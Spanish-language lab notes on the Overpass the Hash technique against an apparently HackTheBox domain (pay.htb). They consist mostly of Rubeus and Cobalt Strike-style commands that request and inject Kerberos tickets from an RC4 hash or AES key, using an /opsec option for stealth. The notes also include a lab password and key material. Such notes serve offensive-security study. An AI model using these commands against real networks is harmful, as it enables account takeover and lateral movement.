Overpass the Hash (OPtH)
Overpass the Hash es una técnica más avanzada que se usa en ataques de Pass the Hash. En este caso, el atacante no solo usa el hash de la contraseña para autenticarse, sino que también aprovecha un proceso llamado Kerberos (un protocolo de autenticación en redes) para obtener un ticket de acceso sin necesidad de la contraseña original.
Rubeus nos permite realizar esta tecnica sin necesidad de privilegios elevados.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /domain:pay.htb /user:sqlsvc /rc4:32918fbec63cc3c7c83a8c3c9787842c /nowrapPara simular kerberos traffic genuino podemos hacer uso de AES Keys y utilizar la opcion /opsec. Obtener el hash en AES.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /domain:pay.htb /user:sqlsvc /password:rArOuSHarOuseMiD!Crear ticket con rubeus.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /domain:pay.htb /user:sqlsvc /aes256:100D63912190C59A2D20E12C497E664D8DDF1C67F3DD709F88F6175662C7406F /nowrap /opsecImportar el ticket automaticamente con la opcion /ptt.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /domain:pay.htb /user:sqlsvc /aes256:100D63912190C59A2D20E12C497E664D8DDF1C67F3DD709F88F6175662C7406F /opsec /pttListar tickets.
run klistGuardar ticket localmente.
echo -en "[ticket]" | base64 -d > sqlTGT.kirbi[System.IO.File]::WriteAllBytes("C:\Tools\Payloads\sqlTGT.kirbi", [System.Convert]::FromBase64String("[ticket]"))Utilizar ticket.
kerberos_ticket_use c:\Tools\Payloads\sqlTGT.kirbiEliminar tickets del sistema.
kerberos_ticket_purge